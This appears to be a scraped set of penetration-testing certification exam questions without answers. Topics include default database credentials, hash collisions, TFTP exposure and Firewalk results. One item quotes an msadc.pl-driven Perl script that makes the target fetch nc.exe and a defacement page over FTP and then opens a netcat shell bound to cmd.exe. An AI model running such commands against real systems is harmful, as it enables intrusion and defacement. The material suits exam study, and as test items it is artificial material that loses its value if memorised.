How can this weakness be exploited to access the system?
During a penetration test, a tester finds a target that is running MS SQL 2000 with default
credentials. The tester assumes that the service is running with Local System account. How
can this weakness be exploited to access the system?
Which of the following programming languages is most vulnerable to buffer overflow attacks?
Which of the following programming languages is most vulnerable to buffer overflow attacks?
Which property ensures that a hash function will not produce the same hashed value for two different messages?
Which property ensures that a hash function will not produce the same hashed value for two
different messages?
which of the following is occurring?
From the two screenshots below, which of the following is occurring?
Which of the following can the administrator do to verify that a tape backup can be recovered in its entirety?
Which of the following can the administrator do to verify that a tape backup can be recovered in its
entirety?
What risk could this pose?
An NMAP scan of a server shows port 69 is open. What risk could this pose?
Which exploit is indicated by this script?
A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows
NT4 web server. While it is effective, the tester finds it tedious to perform extended functions. On
further research, the tester come across a perl script that runs the following msadc
functions:system(“perl msadc.pl -h $host -C \”echo open $your >testfile\””); system(“perl msadc.pl
-h $host -C \”echo $user>>testfile\””); system(“perl msadc.pl -h $host -C \”echo
$pass>>testfile\””); system(“perl msadc.pl -h $host -C \”echo bin>>testfile\””); system(“perl
msadc.pl -h $host -C \”echo get nc.exe>>testfile\””); system(“perl msadc.pl -h $host -C \”echo get
hacked.html>>testfile\””); (“perl msadc.pl -h $host -C \”echo quit>>testfile\””); system(“perl
msadc.pl -h $host -C \”ftp \-s\:testfile\””); $o=; print “Opening …\n”; system(“perl msadc.pl -h
$host -C \”nc -l -p $port -e cmd.exe\””);
Which exploit is indicated by this script?
Which of the following is true?
When setting up a wireless network, an administrator enters a pre-shared key for security. Which
of the following is true?
Which of the following defines the role of a root Certificate Authority (CA) in a Public Key Infrastructure (P
Which of the following defines the role of a root Certificate Authority (CA) in a Public Key
Infrastructure (PKI)?
What conclusions can be drawn based on these scan results?
Firewalk has just completed the second phase (the scanning phase) and a technician receives the
output shown below. What conclusions can be drawn based on these scan results? TCP port 21 –
no response TCP port 22 – no response TCP port 23 – Time-to-live exceeded